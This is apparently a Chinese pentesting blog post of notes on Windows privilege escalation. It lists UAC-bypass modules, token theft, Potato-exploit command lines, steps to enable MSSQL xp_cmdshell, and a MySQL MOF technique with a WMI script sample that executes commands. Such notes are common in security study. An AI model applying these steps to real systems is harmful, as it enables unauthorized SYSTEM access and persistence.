<p>UAC:用户账户控制，Windows的一个安全功能，支持防止对操作系统进行未授权的修改,UAC确保仅在管理员授权的情况下进行某些更改</p>
</blockquote>
<h4 id="没有管理员权限无法完成的操作"><a href="#没有管理员权限无法完成的操作" class="headerlink" title="没有管理员权限无法完成的操作"></a>没有管理员权限无法完成的操作</h4><ul>
<li>注册表修改</li>
<li>加载设备驱动程序</li>
<li>DLL注入</li>
<li>修改系统时间</li>
<li>修改用户账户控制设置</li>
<li>修改受保护的目录</li>
<li>计划任务</li>
</ul>
<p>####利用方法</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs SHELL"><span class="hljs-meta prompt_">#</span><span class="language-bash">MSF</span><br>	exploit/wondows/local/ask  #弹出UAC确认窗口，点击后获得system权限<br>	exploit/windows/local/bypassuac	#通过进程注入使用可信任发布者绕过Windows UAC,生成关闭UAC标志的第二个shell<br>	exploit/windows/local/bypass_injection	#通过进程注入使用可信任发布者绕过Windows UAC<br>	exploit/windows/local/bypass_fodhelper	#通过当前用户配置单元下劫持注册表中特殊的键并插入将在启动Windows事件查看器/fodhelper.exe 应用程序时调用自定义命令来绕过UAC<br>	exploit/windows/local/bypass_eventvwr	#与上一个一致，调用注册表项在调用payload清除该项，不需要payload的体系架构和操作系统匹配<br>	exploit/windows/local/bypassuac_comhijack	#通过在hkcu配置单元中创建COM处理程序注册表项来绕过Windows UAC<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">POWERSHELL</span><br>	Invoke-PsUACme<br><span class="hljs-meta prompt_">	</span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">Empire</span><br>	usemodule privesc/bypassuac<br>	usemodule privesc/bypassuac_wscript<br><span class="hljs-meta prompt_">	</span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">cs</span><br>	uac-dll<br>	uac-token-duplication<br></code></pre></td></tr></table></figure>

<h3 id="令牌窃取"><a href="#令牌窃取" class="headerlink" title="令牌窃取"></a>令牌窃取</h3><h4 id="利用方法"><a href="#利用方法" class="headerlink" title="利用方法"></a>利用方法</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs SHELL"><span class="hljs-meta prompt_">#</span><span class="language-bash">MSF</span><br>	use incognito	#进入incognito模块<br>	list_tokens -u	#列出令牌<br>	Delegation Token	#授权令牌<br>	Impresonation Token	#模拟令牌<br>	<br>	impresonate_Token &quot;令牌名&quot;<br></code></pre></td></tr></table></figure>

<h5 id="Potato家族提权"><a href="#Potato家族提权" class="headerlink" title="Potato家族提权"></a>Potato家族提权</h5><h6 id="Origin-Potato-MS08-068"><a href="#Origin-Potato-MS08-068" class="headerlink" title="Origin Potato(MS08-068)"></a>Origin Potato(MS08-068)</h6><h6 id="Hot-Potato-MS16-075"><a href="#Hot-Potato-MS16-075" class="headerlink" title="Hot Potato(MS16-075)"></a>Hot Potato(MS16-075)</h6><blockquote>
<p>基于NTLM反射的权限的攻击方式，可以从主机最低用户权限提升至system，其中将利用ntlm relay(http-&gt;smb)和nbns欺骗，获取windows最高权限</p>
</blockquote>
<h6 id="Rotten-Potato-MS16-075变种"><a href="#Rotten-Potato-MS16-075变种" class="headerlink" title="Rotten Potato(MS16-075变种)"></a>Rotten Potato(MS16-075变种)</h6><blockquote>
<p>CVE-2020-0668<br>CVE-2020-0683 MSI Package Symbolic Links Processing - Windows 10 Privilege Escalation<br>CVE-2020-8950<br>CVE-2020-0683<br>CVE-2019-1002101<br>CVE-2019-0986<br>CVE-2018-1088</p>
</blockquote>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/breenmachine/RottenPotatoNG/">https://github.com/breenmachine/RottenPotatoNG/</a><br><a target="_blank" rel="noopener" href="https://github.com/SecWiki/windows-kernel-exploits">https://github.com/SecWiki/windows-kernel-exploits</a></p>
</blockquote>
<h6 id="Juicy-Potato"><a href="#Juicy-Potato" class="headerlink" title="Juicy Potato"></a>Juicy Potato</h6><blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/shanfenglan/test/tree/master/juicypotato">https://github.com/shanfenglan/test/tree/master/juicypotato</a><br>1.使用powershell脚本找到可用的CLSID<br><code>SHELL PowerShell.exe -ExecutionPolicy Bypass -File 1.ps1 &gt; CLSID.list</code><br>2.使用bat文件确定能利用的CLSID,bat文件需与clsid.list文件放在同一目录下执行，生成result.log文件<br>3.juicypotato工具下载<br><code>SHELL JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c result.log文件中的内容</code></p>
</blockquote>
<h6 id="Sweet-Potato"><a href="#Sweet-Potato" class="headerlink" title="Sweet Potato"></a>Sweet Potato</h6><blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/CCob/SweetPotato">https://github.com/CCob/SweetPotato</a><br><code>SHELL SweetPotato.exe -a &quot;whoami&quot;</code></p>
</blockquote>
<h3 id="数据库提权"><a href="#数据库提权" class="headerlink" title="数据库提权"></a>数据库提权</h3><h4 id="MSSQL"><a href="#MSSQL" class="headerlink" title="MSSQL"></a>MSSQL</h4><blockquote>
<p>启用xp_shell</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs MSSQL">select IS_SRVROLEMEMBER(&#x27;sysadmin&#x27;)#查询是否为sysadmin用户，sysadmin执行命令继承了数据库的权限，前提在windows下，数据库(旧版本，新版本默认降权)默认没有被降权,默认就是system权限<br><br>EXEC sp_configure &#x27;show advanced options&#x27;,1<br>GO<br>RECONFIGURE<br>GO<br>EXEC sp_configure &#x27;xp_cmdshell&#x27;,1<br>GO<br>RECONFIGURE<br>GO<br><br>exec master..xp_cmdshell &quot;whoami&quot; --<br></code></pre></td></tr></table></figure>

<h4 id="MYSQL"><a href="#MYSQL" class="headerlink" title="MYSQL"></a>MYSQL</h4><blockquote>
<p>Windows&lt;&#x3D;2003<br>Mysql在C:&#x2F;Windows&#x2F;system32&#x2F;mof目录有写权限</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs MYSQL">#mysql语句将恶意mov文件替换nullevt.mof，需先上传<br>select load_file(&quot;hacker.mof&quot;) into dumpfile &quot;c:/windows/system32/wbem/mof/nullevt.mof&quot;<br><br>mof文件样本<br>#pragma namespace(&quot;\\\\.\\root\\subscription&quot;)<br>instance of __EventFilter as $EventFilter<br>&#123;<br>EventNamespace = &quot;Root\\Cimv2&quot;;<br>Name = &quot;filtP2&quot;;<br>Query = &quot;Select * From __InstanceModificationEvent &quot;<br>&quot;Where TargetInstance Isa \&quot;Win32_LocalTime\&quot; &quot;<br>&quot;And TargetInstance.Second = 5&quot;;<br>QueryLanguage = &quot;WQL&quot;;<br>&#125;;<br>instance of ActiveScriptEventConsumer as $Consumer<br>&#123;<br>Name = &quot;consPCSV2&quot;;<br>ScriptingEngine = &quot;JScript&quot;;<br>ScriptText =<br>&quot;var WSH = new ActiveXObject(\&quot;WScript.Shell\&quot;)\nWSH.run(\&quot;命令\&quot;)&quot;;<br>&#125;;<br>instance of __FilterToConsumerBinding<br>&#123;<br>Consumer = $Consumer;<br>Filter = $EventFilter;<br>&#125;;<br></code></pre></td></tr></table></figure>

<h3 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h3>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%B8%97%E9%80%8F/" class="category-chain-item">渗透</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/">#权限提升</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>提权</div>
      <div>http://15555553535.github.io/2023/04/23/提权/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Quinn</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年4月23日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/04/28/MSF/" title="MSF用法">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">MSF用法</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                  </article>
                </div>
              
            </div>

            
  
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <i class="iconfont icon-love"></i> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
